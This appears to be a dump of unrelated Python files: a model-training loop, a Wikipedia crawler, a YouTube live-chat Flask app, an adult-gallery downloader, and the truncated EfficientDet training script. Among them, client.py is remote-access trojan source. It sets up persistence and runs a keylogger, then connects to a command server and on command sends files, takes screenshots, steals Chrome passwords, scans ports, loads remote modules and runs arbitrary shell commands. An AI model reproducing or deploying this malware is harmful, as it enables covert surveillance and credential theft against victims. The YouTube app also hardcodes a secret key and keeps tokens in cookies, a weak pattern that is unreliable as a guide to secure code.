    validation_tasks = []
    if val_iter:
        validation_tasks = init_parallel_jobs([validation_db], validation_queue, sample_data, False)

    # The semaphores start acquired; releasing them later tells the
    # pin-memory threads to exit (see pin_memory).
    training_pin_semaphore   = threading.Semaphore()
    validation_pin_semaphore = threading.Semaphore()
    training_pin_semaphore.acquire()
    validation_pin_semaphore.acquire()

    training_pin_args   = (training_queue, pinned_training_queue, training_pin_semaphore)
    training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
    training_pin_thread.daemon = True
    training_pin_thread.start()

    validation_pin_args   = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
    validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
    validation_pin_thread.daemon = True
    validation_pin_thread.start()

    print("building model...")
    nnet = NetworkFactory(training_dbs[0])

    if pretrained_model is not None:
        if not os.path.exists(pretrained_model):
            raise ValueError("pretrained model does not exist")
        print("loading from pretrained model")
        nnet.load_pretrained_params(pretrained_model)

    if start_iter:
        # Recompute the decayed learning rate for the resumed iteration.
        learning_rate /= (decay_rate ** (start_iter // stepsize))
        nnet.load_params(start_iter)
        nnet.set_lr(learning_rate)
        print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
    else:
        nnet.set_lr(learning_rate)

    print("training start...")
    nnet.cuda()
    nnet.train_mode()
    with stdout_to_tqdm() as save_stdout:
        for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
            training = pinned_training_queue.get(block=True)
            training_loss = nnet.train(**training)  # compute the training loss

            if display and iteration % display == 0:
                print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
            del training_loss

            if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
                nnet.eval_mode()
                validation = pinned_validation_queue.get(block=True)
                validation_loss = nnet.validate(**validation)
                print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
                nnet.train_mode()

            if iteration % snapshot == 0:
                nnet.save_params(iteration)

            if iteration % stepsize == 0:
                learning_rate /= decay_rate
                nnet.set_lr(learning_rate)

    # sending signal to kill the pin-memory threads
    training_pin_semaphore.release()
    validation_pin_semaphore.release()

    # terminating data fetching processes
    for training_task in training_tasks:
        training_task.terminate()
    for validation_task in validation_tasks:
        validation_task.terminate()
if __name__ == "__main__":
    # Parse the command-line/config arguments.
    args = parse_args()
    cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
    with open(cfg_file, "r") as f:
        configs = json.load(f)
    # Snapshots are named after the config file.
    configs["system"]["snapshot_name"] = args.cfg_file
    system_configs.update_config(configs["system"])
    train_split = system_configs.train_split
    val_split = system_configs.val_split
    print("loading all datasets...")
    dataset = system_configs.dataset
    # threads = max(torch.cuda.device_count() * 2, 4)
    threads = args.threads
    print("using {} threads".format(threads))
    # One dataset handle per prefetch worker.
    training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
    validation_db = datasets[dataset](configs["db"], val_split)
    print("system config...")
    pprint.pprint(system_configs.full)
    print("db config...")
    pprint.pprint(training_dbs[0].configs)
    print("len of db: {}".format(len(training_dbs[0].db_inds)))
    train(training_dbs, validation_db, args.start_iter)
|
Collector.py | import requests
import threading
from queue import Queue
from lxml import html
import time
class Collector():
    """Multi-threaded breadth-first Wikipedia link collector.

    Starting from one article, fetches pages, extracts in-wiki links, logs
    each page's outgoing links to the 'WikiPages' file, and enqueues unseen
    links for the worker threads to crawl.
    """
    # Link fragments that identify non-article pages to skip.
    itemsToCheck = ['#', 'File:', '_(disambiguation)', 'Template:', 'Category:', 'Wikipedia_talk:']

    def __init__(self, url):
        self.startUrl = url
        self.seen = []          # URLs already fetched (NOTE: list membership is O(n))
        self.queue = Queue()    # frontier of URLs still to fetch
        self.counter = 0        # pages processed, for the progress display
        self.threads = []

    def startCollection(self, thread_amount):
        """Seed the queue from the start URL, then crawl with worker threads."""
        self.initialCollection(self.startUrl)
        time.sleep(5)
        self.createThreads(thread_amount)
        print(f'{thread_amount} threads have started')

    def _scrapePage(self, curr):
        """Fetch *curr*, enqueue its unseen wiki links, append them to disk.

        Returns False when the request failed (the URL is re-queued for a
        later retry)."""
        self.counter += 1
        print(f"\r{self.counter}", end="")
        try:
            res = requests.get(curr, headers={'Accept': 'application/json'})
        except Exception:
            print(f'Error at URL: {curr}')
            self.queue.put(curr)  # retry later
            # BUG FIX: the original fell through here and used the unbound
            # 'res', raising NameError on any failed request.
            return False
        self.seen.append(curr)
        webpage = html.fromstring(res.content)
        # Prefer links that appear before the "See also" section.
        roughLinks = webpage.xpath("//div[@id='mw-content-text']//preceding::span[@id='See_also']/preceding::a/@href")
        if len(roughLinks) == 0:
            roughLinks = webpage.xpath("//div[@id='mw-content-text']//a/@href")
        cleanedLinks = []
        for href in roughLinks:
            if not href.startswith('/wiki/') or any(x in href for x in self.itemsToCheck):
                continue
            link = 'https://en.wikipedia.org' + href
            cleanedLinks.append(link)
            if link not in self.seen:
                self.queue.put(link)
        # NOTE(review): [:-1] chops the final character of the last link;
        # looks like leftover trailing-separator stripping — confirm before
        # changing the on-disk format.
        f = open('WikiPages', 'a')
        f.write(curr + ' ' + ' '.join(link for link in cleanedLinks)[:-1] + '\n')
        f.close()
        return True

    def initialCollection(self, url):
        """Process the seed URL once to populate the queue."""
        self.queue.put(url)
        self._scrapePage(self.queue.get())

    def collectPages(self):
        """Worker loop: drain the queue, skipping already-seen pages."""
        while not self.queue.empty():
            curr = self.queue.get()
            if curr in self.seen:
                continue
            self._scrapePage(curr)

    def createThreads(self, amount):
        """Spawn *amount* daemon worker threads and wait for them to finish."""
        print(f'Creating {amount} Threads')
        for _ in range(amount):
            # BUG FIX: pass the bound method itself. The original used
            # target=self.collectPages(), which ran the crawl synchronously
            # in this thread and handed Thread a target of None.
            t = threading.Thread(target=self.collectPages)
            t.daemon = True
            self.threads.append(t)
        print(f'Starting {len(self.threads)} Threads')
        for i in range(amount):
            self.threads[i].start()
        for i in range(amount):
            self.threads[i].join()
if __name__ == '__main__':
    startURL = 'https://en.wikipedia.org/wiki/Bread'
    print(f"Starting Collector at URL: {startURL}")
    # Crawl with 10 worker threads starting from the Bread article.
    BreadCollector = Collector(startURL)
    BreadCollector.startCollection(10)
yt.py | import json
from apiclient.discovery import build_from_document, build
import httplib2
import random
import time
import os
from oauth2client.client import OAuth2WebServerFlow, AccessTokenCredentials
from flask import Flask, render_template, session, request, redirect, url_for, abort, jsonify, Response
from flask_socketio import SocketIO, emit, join_room, leave_room
from threading import Thread
from flask_pymongo import PyMongo
CLIENT_ID = os.getenv('CLIENT_ID')
CLIENT_SECRET = os.getenv('CLIENT_SECRET')
app = Flask(__name__)
app.config['MONGO_DBNAME'] = 'yt'
app.config['MONGO_URI'] = os.getenv('MONGOURL')
app.secret_key = 'mysecretKEY'
socketio = SocketIO(app)
mongo = PyMongo(app)
activeRooms = {}
def getComments(id, youtube, credentials, pageToken=""):
    """Poll the YouTube live-chat API for room *id*, store and broadcast
    new comments, then recurse with the API's nextPageToken.

    NOTE(review): the recursion never unwinds while a room stays active, so
    a long-lived stream grows the call stack — consider a loop.
    """
    print("GETTING with token {}".format(pageToken))
    # Stop polling once the room has no listeners left.
    if id not in activeRooms or len(activeRooms[id]) == 0:
        print("NO USERS")
        activeRooms.pop(id, None)
        return
    # If the credentials we were polling with left the room, adopt another
    # member's credentials and rebuild the API client.
    if not any(c.access_token == credentials.access_token for c in activeRooms[id]):
        print("USING SOMEONE ELSES CREDS")
        credentials = activeRooms[id][0]
        http = httplib2.Http()
        http = credentials.authorize(http)
        youtube = build("youtube", "v3", http=http)
    liveStreamingInfo = youtube.videos().list(
        part="liveStreamingDetails",
        id=id
    ).execute()
    try:
        liveStreamingInfo = liveStreamingInfo['items'][0]['liveStreamingDetails']['activeLiveChatId']
    except:
        # NOTE(review): on failure liveStreamingInfo is still the raw API
        # response dict, and the liveChatMessages call below will receive a
        # bogus liveChatId — confirm intended error handling.
        print("no livestreaming info")
    comments = youtube.liveChatMessages().list(
        liveChatId=liveStreamingInfo,
        part="snippet, authorDetails",
        pageToken=pageToken
    ).execute()
    # insert comments['items'] into mongodb, only want author, display text, and current room id
    with app.app_context():
        if len(comments['items']):
            mongo.db.comments.insert_many(
                [{'text': comment['snippet']['displayMessage'], 'author': comment['authorDetails']['displayName'], 'publishedAt': comment['snippet']['publishedAt'], "channel": id} for comment in comments['items']])
    # Newest first for display.
    comments['items'] = list(reversed(comments['items']))
    print("EMITTING TO ROOM {}".format(id))
    socketio.emit('comments', comments, room=id)
    socketio.sleep(0)
    # Respect the API's requested polling interval before the next fetch.
    print("WAITING {}".format(comments['pollingIntervalMillis']/1000.0))
    time.sleep(comments["pollingIntervalMillis"]/1000.0)
    getComments(id, youtube, credentials, comments["nextPageToken"])
@socketio.on('connect')
def test_connect():
    """Socket.IO connect handler: just logs the connection."""
    print('Client connected')
@socketio.on('disconnect')
def test_disconnect():
    """Remove the disconnecting user's credentials from every room."""
    global activeRooms
    print('Client disconnected')
    credentials = AccessTokenCredentials(session['credentials'], 'user-agent-value')
    for room in activeRooms:
        # NOTE(review): removing from activeRooms[room] while iterating it can
        # skip the element after each removal — confirm a user never appears
        # twice in one room, or iterate over a copy.
        for c in activeRooms[room]:
            if c.access_token == credentials.access_token:
                print("FOUND AND REMOVING")
                activeRooms[room].remove(c)
@socketio.on('join')
def on_join(data):
    """Join a chat room; start a comment-polling thread for new rooms."""
    print("joining")
    # On join of a room. Check if that room is currently an active room.
    # If its not, add it to the active rooms and start getting comments for it.
    # If it is, do nothing
    id = data['id']
    join_room(id)
    credentials = AccessTokenCredentials(session['credentials'], 'user-agent-value')
    global activeRooms
    if id not in activeRooms:
        activeRooms[id] = [credentials]
        http = httplib2.Http()
        http = credentials.authorize(http)
        youtube = build("youtube", "v3", http=http)
        # One background poller per room; it exits when the room empties.
        thread1 = Thread(target=getComments, args = (id, youtube, credentials))
        thread1.start()
    else:
        activeRooms[id].append(credentials)
@app.route('/comments/<username>')
def getCommentCountForUser(username):
    """Return the stored comment count for *username* as JSON."""
    try:
        print(username)
        commentsCount = mongo.db.comments.count({"author": username})
        return jsonify({'comments': commentsCount})
    except Exception as e:
        # NOTE(review): on failure this returns None, which Flask turns into
        # a 500 — consider an explicit error response.
        print(e)
@app.route('/login')
def login():
    """Kick off the Google OAuth2 flow for YouTube access."""
    flow = OAuth2WebServerFlow(client_id=CLIENT_ID,
                               client_secret=CLIENT_SECRET,
                               scope='https://www.googleapis.com/auth/youtube',
                               redirect_uri='https://streamlabs-challenge.herokuapp.com/oauth2callback',
                               approval_prompt='force',
                               access_type='offline')
    auth_uri = flow.step1_get_authorize_url()
    return redirect(auth_uri)
@app.route('/signout')
def signout():
    """Clear the stored OAuth credentials and redirect back to the index page.

    BUG FIX: ``del session['credentials']`` raised KeyError when a user hit
    /signout while not signed in; ``pop`` with a default is a no-op then.
    """
    session.pop('credentials', None)
    session['message'] = "You have logged out"
    return redirect(url_for('index'))
@app.route('/oauth2callback')
def oauth2callback():
    """OAuth2 redirect target: exchange the authorization code for a token.

    BUG FIX: on a failed exchange the original fell through and read the
    unbound ``credentials`` variable (NameError); now it bounces the user
    back to /login.  Also replaces the Python-2-only ``print`` statement and
    deprecated ``e.message`` with portable equivalents.
    """
    code = request.args.get('code')
    if code:
        # exchange the authorization code for user credentials
        flow = OAuth2WebServerFlow(CLIENT_ID,
                                   CLIENT_SECRET,
                                   "https://www.googleapis.com/auth/youtube")
        flow.redirect_uri = request.base_url
        try:
            credentials = flow.step2_exchange(code)
        except Exception as e:
            print("Unable to get an access token because %s" % e)
            return redirect(url_for('login'))
        # store these credentials for the current user in the session
        # This stores them in a cookie, which is insecure. Update this
        # with something better if you deploy to production land
        session['credentials'] = credentials.access_token
    return redirect(url_for('index'))
@app.route('/')
def index():
    """Render the landing page with the top currently-live embeddable video.

    Redirects to /login when the session has no credentials or the API call
    fails (e.g. expired token).
    BUG FIX: the original indexed ``topVid['items'][0]`` unconditionally and
    crashed with IndexError whenever the search returned no live streams.
    """
    if 'credentials' not in session:
        return redirect(url_for('login'))
    credentials = AccessTokenCredentials(session['credentials'], 'user-agent-value')
    http = httplib2.Http()
    http = credentials.authorize(http)
    topVid = None
    try:
        youtube = build("youtube", "v3", http=http)
        topVid = youtube.search().list(
            part="snippet",
            eventType="live",
            type="video",
            videoEmbeddable="true"
        ).execute()
    except Exception as e:
        # Any API failure sends the user back through the OAuth flow.
        return redirect(url_for('login'))
    items = topVid.get('items', [])
    if not items:
        # No live embeddable streams right now; fail gracefully instead of 500.
        return "No live streams are available right now. Please try again later.", 503
    return render_template("index.html", topVid=json.dumps(items[0]))
if __name__ == '__main__':
    # BUG FIX: the original called app.run() first, which blocks forever, so
    # socketio.run(app) on the next line was never reached and WebSocket
    # support never started.  Flask-SocketIO apps must be launched with
    # socketio.run(), which wraps the Flask dev server.
    socketio.run(app, host='0.0.0.0')
|
hentairoxdl.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# script by HYOUG
from argparse import ArgumentParser
from os import listdir, makedirs, remove
from os.path import basename, exists, join
from threading import Lock, Thread
from time import sleep, time
from zipfile import ZIP_DEFLATED, ZipFile
from bs4 import BeautifulSoup
from colorama import Fore
from requests import get
from tqdm import tqdm
from misc.errors import *
# File extensions probed, in order, when guessing a page image's format.
IMAGE_EXTENSIONS = ["jpg", "png", "gif"]
# Characters Windows forbids in filenames; user filename models containing
# them are rejected by dl_gallery's assertions.
FORBIDDEN_CHARS = ["<", ">", ":", "\"", "/", "\\", "|", "?", "*"]
# Alias so isinstance checks can refer to the type of None.
NONE_TYPE = type(None)
# Gallery metadata accumulated while scraping.
# NOTE(review): module-level and never reset, so repeated dl_gallery calls
# in one process accumulate tags across galleries.
metadata_dict = {
    "parodies": [],
    "characters": [],
    "tags": [],
    "artists": [],
    "groups": [],
    "languages": [],
    "category": []
}
# Placeholders substitutable in the user-supplied --filename model string.
model_vars = {
    "gallery_name": "",
    "gallery_id": "",
    "page_num": "",
    "pages_num": ""
}
def dl_gallery(gallery_url:str, output:str, filename:str, pages:list,
               archive: str or NONE_TYPE, threads:int, metadata:bool) -> None:
    """
    Download a given Hentai Rox Gallery.

    Scrapes the gallery page for its name, metadata and page count, then
    downloads the page images with ``threads`` worker threads, optionally
    archiving them into a zip file and saving the metadata to a text file.

    Parameters
    ----------
    gallery_url : str
        URL from the targeted gallery page
    output : str
        Output path for the downloaded pictures, by default "./downloads"
    filename : str
        Filename model for the downloaded pictures, by default "{gallery_id}_{page_num}"
    pages : list
        Minimum and maximum page indexed for the downloaded pictures, by default [0, -1]
    archive : str or NONE_TYPE
        Archive the downloaded pictures if a name is given, by default None
    threads : int
        Number of workers downloading pictures in parallel, by default 1
    metadata : bool
        Save gallery metadata in a file (metadata.txt), by default False

    Raises
    ------
    InvalidURL
        The gallery URL given is invalid
    """
    # NOTE(review): ``str or NONE_TYPE`` in the signature evaluates to just
    # ``str`` at runtime -- it is documentation only; Optional[str] is meant.
    assert isinstance(gallery_url, str), f"Invalid data format given for the 'gallery_url' argument : {type(gallery_url)} (instead of str)"
    assert isinstance(output, str), f"Invalid data format given for the 'output' argument : {type(output)} (instead of str)"
    assert isinstance(filename, str), f"Invalid data format given for the '_filename' argument : {type(filename)} (instead of str)"
    assert isinstance(pages, list), f"Invalid data format given for the 'pages' argument : {type(pages)} (instead of list)"
    assert isinstance(archive, (NONE_TYPE, str)), f"Invalid data format given for the 'archive' argument : {type(archive)} (instead of NONE_TYPE or str)"
    assert isinstance(threads, int), f"Invalid data format given for the 'threads' argument : {type(threads)} (instead of int)"
    assert isinstance(metadata, bool), f"Invalid data format given for the 'metadata' argument : {type(metadata)} (instead of bool)"
    assert gallery_url.startswith("https://hentairox.com/gallery/") or gallery_url.startswith("https://www.hentairox.com/gallery/"), f"Invalid gallery URL given : {gallery_url}"
    assert True not in [el in filename.format(**model_vars) for el in FORBIDDEN_CHARS], f"Invalid filename given, it contains forbiden characters : (unknown)"
    # Last non-empty URL path segment is the numeric gallery id.
    gallery_id = [i for i in gallery_url.split("/") if i != ""][-1]
    threads_list = []
    # Set by the KeyboardInterrupt handler; workers poll it under stop_lock.
    dl_cancelled = False
    pbar_lock = Lock()
    stop_lock = Lock()
    archive_lock = Lock()
    if not exists(output):
        makedirs(output)
    response = get(gallery_url)
    if response.status_code == 404:
        raise InvalidURL(gallery_url)
    soup = BeautifulSoup(response.content, "html.parser")
    gallery_name = soup.find("h1").string
    # Classify each metadata tag by the URL prefix of its parent link.
    metadata_tags = soup.find_all("span", {"class": "item_name"})
    for metadata_tag in metadata_tags:
        metadata_type = metadata_tag.parent["href"]
        if metadata_type.startswith("/parody"):
            metadata_dict["parodies"].append(metadata_tag.contents[0])
        elif metadata_type.startswith("/character"):
            metadata_dict["characters"].append(metadata_tag.contents[0])
        elif metadata_type.startswith("/tag"):
            metadata_dict["tags"].append(metadata_tag.contents[0])
        elif metadata_type.startswith("/artist"):
            metadata_dict["artists"].append(metadata_tag.contents[0])
        elif metadata_type.startswith("/group"):
            metadata_dict["groups"].append(metadata_tag.contents[0])
        elif metadata_type.startswith("/language"):
            metadata_dict["languages"].append(metadata_tag.contents[0])
        elif metadata_type.startswith("/category"):
            metadata_dict["category"].append(metadata_tag.contents[0])
    page_num_node = soup.find("li", {"class": "pages"})
    pages_num = int(page_num_node.string.split(" ")[0])
    # Image URLs share the directory of the first preloaded image.
    first_img = soup.find("img", {"class": "lazy preloader"})
    pattern = "/".join(first_img["data-src"].split("/")[:-1]) + "/"
    print(f"\nGallery : {Fore.LIGHTBLUE_EX}{gallery_name}{Fore.RESET}\n")
    if archive is not None:
        fp_archive = join(output, f"{archive}.zip")
        if f"{archive}.zip" not in listdir(output):
            zf = ZipFile(fp_archive, "w", ZIP_DEFLATED)
        else:
            zf = ZipFile(fp_archive, "a", ZIP_DEFLATED)
    if metadata:
        fp = join(output, "metadata.txt")
        f = open(fp, "w", encoding="utf-8")
        f.write(f"Gallery name: {gallery_name}\n")
        f.write(f"URL: {gallery_url}\n")
        f.write(f"Pages: {pages_num}\n\n")
        f.write(f"Metadata:\n")
        for (category, tag_list) in metadata_dict.items():
            if len(tag_list) > 0:
                f.write(f"* {category}: {', '.join(tag_list)}\n")
        f.close()
        if archive is not None:
            # Move metadata.txt into the zip instead of leaving it on disk.
            zf.write(fp, basename(fp))
            remove(fp)
    # Normalize the (possibly negative) user page indexes to absolute
    # positions in [0, pages_num).
    p_start = list(range(pages_num)).index(list(range(pages_num))[pages[0]])
    p_end = list(range(pages_num)).index(list(range(pages_num))[pages[1]])
    p_len = p_end - p_start
    dl_bar = tqdm(
        iterable=range(p_start, p_end),
        bar_format="Download : |{bar:30}| [{n_fmt}/{total_fmt}] ({percentage:.0f}%)",
        ascii="_▌█")
    def dl_pages(start_index, end_index):
        # Worker body: download pages [start_index, end_index) and store them
        # either into the shared zip (serialized by archive_lock) or as files.
        for i in range(start_index, end_index):
            # Probe each known extension until the server returns 200.
            # NOTE(review): ``pattern`` already ends with "/" so this URL
            # contains a double slash -- the host appears to tolerate it.
            for ext in IMAGE_EXTENSIONS:
                response = get(f"{pattern}/{i+1}.{ext}")
                if response.status_code == 200:
                    formatfound = True
                    im_ext = ext
                    break
                formatfound = False
            if formatfound:
                # model_vars is module-global and shared between workers, so
                # concurrent writes here can race; page_num may be stale.
                model_vars["gallery_name"] = gallery_name
                model_vars["gallery_id"] = gallery_id
                model_vars["page_num"] = str(i)
                model_vars["pages_num"] = str((end_index-1)-start_index)
                parsed_filename = filename.format(**model_vars)
                if archive is not None:
                    with archive_lock:
                        zf = ZipFile(fp_archive, "a")
                        try:
                            zf.writestr(f"{parsed_filename}.{im_ext}", response.content)
                        except UserWarning:
                            pass #TODO Handle error
                        except OSError:
                            pass #TODO Handle error
                        zf.close()
                else:
                    fp = join(output, f"{parsed_filename}.{im_ext}")
                    try:
                        f = open(fp, "wb")
                    except OSError:
                        # NOTE(review): if open() fails, ``f`` is unbound (or
                        # a stale closed handle) and the write below raises.
                        pass #TODO Handle error
                    f.write(response.content)
                    f.close()
            with stop_lock:
                if dl_cancelled:
                    break
                else:
                    with pbar_lock:
                        dl_bar.update()
    # Split the page range evenly; the last worker also takes the remainder.
    for i in range(threads):
        if i != threads-1:
            t_start = p_start + ((p_len//threads) * i)
            t_end = p_start + ((p_len//threads) * (i+1))
        else:
            t_start = p_start + ((p_len//threads) * i)
            t_end = p_start + ((p_len//threads) * (i+1)) + (p_len % threads)
        thread = Thread(target=dl_pages, args=(t_start, t_end))
        threads_list.append(thread)
        threads_list[-1].start()
    try:
        # Busy-wait for all workers so Ctrl-C is still delivered to the main
        # thread (Thread.join would block KeyboardInterrupt on some setups).
        while True:
            end = True
            for thread in threads_list:
                if thread.is_alive():
                    end = False
            if end:
                break
    except KeyboardInterrupt:
        # Signal workers to stop at their next stop_lock check, then exit.
        dl_cancelled = True
        with pbar_lock:
            dl_bar.close()
        sleep(2)
        with stop_lock:
            print(f"\n{Fore.LIGHTRED_EX}Download cancelled{Fore.RESET}")
        exit()
def main():
    """Parse command-line arguments and download each requested gallery."""
    start = time()
    parser = ArgumentParser(prog="HentaiRoxDL.py",
                            epilog="Made with <3 by HYOUG")
    parser.add_argument("gallery_url",
                        nargs="+",
                        help="The URL from the targeted gallery page",
                        metavar="GALLERY_URL")
    parser.add_argument("-o", "--output",
                        default="./downloads",
                        help="Path for the output for the downloaded content",
                        metavar="PATH")
    parser.add_argument("-f", "--filename",
                        default="{gallery_id}_{page_num}",
                        help="Filename model given to the downloaded pictures",
                        metavar="FILENAME_MODEL")
    parser.add_argument("-p", "--pages",
                        nargs=2,
                        default=[0, -1],
                        type=int,
                        help="Specific page indexes to download",
                        metavar=("START_INDEX", "STOP_INDEX"))
    parser.add_argument("-a", "--archive",
                        default=None,
                        help="Archive the downloaded pictures in a zip file with the given name",
                        metavar="ARCHIVE_NAME")
    parser.add_argument("-t", "--threads-num",
                        default=1,
                        type=int,
                        help="Downloads the targeted pictures in parallel with N threads. N being the provided argument",
                        metavar="WORKERS_NUM")
    parser.add_argument("-m", "--metadata",
                        action="store_true",
                        default=False,
                        help="Save the gallery's metadata into a file (metadata.txt)")
    args = parser.parse_args()
    for url in args.gallery_url:
        # BUG FIX: argparse stores "--threads-num" as ``threads_num``
        # (hyphens become underscores); the original read the non-existent
        # ``args.threads`` and crashed with AttributeError on every run.
        dl_gallery(url, args.output, args.filename, args.pages, args.archive,
                   args.threads_num, args.metadata)
    print(f"\n{Fore.LIGHTGREEN_EX}Download finished in {(time()-start):.0f} seconds{Fore.RESET}")


if __name__ == "__main__":
    main()
|
client.py | import os
import subprocess
import time
from PIL import ImageGrab
import tempfile
import shutil
import socket
import threading
import pyaudio
import wave
import cv2
import operator
import collections
from modules import persistent
from modules import serverdiscovery
from modules import keylog
from modules import scanner
from modules import admincheck
from modules import chrome
from modules import dynmod
###################
#making a copy of it
###################
try:
persistent.persist()
print 'step 1 pass'
except:
print 'step 1 fail'
pass
##################
#Keylogger will start as the program starts along with clipboard hijacker
##################
path = os.getcwd().strip('/n')
Null,userprof = subprocess.check_output('set USERPROFILE',shell=True).split('=')
destination = userprof.strip('\n\r') + '\\Documents\\'
#################
pathforkey = destination + 'keylog.txt'
kl = keylog.keyLogger(pathforkey)
try:
threading.Thread(target=kl.run).start()
print 'keylogger pass'
except Exception,e:
print 'keylogger failed' + str(e)
pass
##################
#Transfer module
##################
def transfer(s,path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while packet != '':
s.send(packet)
packet = f.read(1024)
s.send('DONE')
f.close()
else:
s.send('Unable to find out the file')
try:
host = serverdiscovery.sdiscover()
except:
pass
##################
#Starting a actual client
#First checking the server ip and its status i.e up or down
#Do not initiate connection unless server is conform
##################
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 8080))
print 'in step 4'
print 'IP is :' + str(host)
while True:
if (host != '0.0.0.0') :
command = s.recv(1024)
if not command:
pass
elif 'terminate' in command:
s.close()
break
elif 'grab' in command:
grab,path = command.split('*')
try:
transfer(s,path)
except Exception,e:
s.send ( str(e) )
pass
elif 'cd' in command:
code,directory = command.split (' ')
os.chdir(directory)
cur_dir = os.getcwd()
s.send(str(cur_dir))
elif 'screenshot' in command:
dirpath = os.getcwd()
ImageGrab.grab().save(destination + "\img.jpg", "JPEG")
s.send('ok')
elif 'admin?' in command:
result = admincheck.checkadmin()
s.send(str(result))
elif 'scan' in command:
command = command[5:]
ip,ports = command.split(':')
scanner.scanner(s,ip,ports)
elif 'chrome' in command:
chrome.chromepass()
s.send('[+]File saved in documents')
elif 'loadmodule' in command:
none,name,ip = command.split('*')
try:
if (dynmod.lodmod(name,ip) == 1):
s.send("[+]Module loaded successfully")
except:
s.send("[-]Failed to load module")
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read())
s.send( CMD.stderr.read())
def main ():
connect()
main()
|
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
# Command-line flags for training/evaluating EfficientDet.  Grouped roughly
# as: TPU/cluster settings, strategy, checkpoints/hparams, partitioning,
# batch/step sizes, data paths, run mode, and eval/train_and_eval tuning.
flags.DEFINE_string(
    'tpu',
    default=None,
    help='The Cloud TPU to use for training. This should be either the name '
    'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
    'url.')
flags.DEFINE_string(
    'gcp_project',
    default=None,
    help='Project name for the Cloud TPU-enabled project. If not specified, we '
    'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
    'tpu_zone',
    default=None,
    help='GCE zone where the Cloud TPU is located in. If not specified, we '
    'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
                  'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
    'use_xla', False,
    'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
    'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
    'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
    'initialization.')
flags.DEFINE_string('ckpt', None,
                    'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
    'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
    ' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
    'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
    'num_cores_per_replica',
    default=2,
    help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
    'input_partition_dims', [1, 2, 1, 1],
    'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
                     'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
                     'Number of iterations per checkpoint save')
flags.DEFINE_string(
    'training_file_pattern', None,
    'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
                    'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
    'val_json_file', None,
    'COCO validation JSON containing golden bounding boxes. If None, use the '
    'ground truth from the dataloader. Ignored if testdev_dir is not None.')
# Typo fix in help text: "ignorer" -> "ignore".
flags.DEFINE_string('testdev_dir', None,
                    'COCO testdev dir. If not None, ignore val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
                     'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
                    'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
                  'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
    'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
    ' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
                     'Minimum seconds between evaluations.')
flags.DEFINE_integer(
    'eval_timeout', None,
    'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
# Typo fix in help text: "trainining" -> "training".
flags.DEFINE_bool(
    'run_epoch_in_child_process', False,
    'This option helps to rectify CPU memory leak. If True, every epoch is '
    'run in a separate process for train and eval and memory will be cleared.'
    'Drawback: need to kill 2 processes if training needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
  """Train and/or evaluate EfficientDet according to FLAGS.

  Builds estimator params from the model's hparams config plus flags,
  constructs a TPUEstimator (strategy == 'tpu') or a plain Estimator
  (optionally MirroredStrategy for 'gpus'), then dispatches on FLAGS.mode:
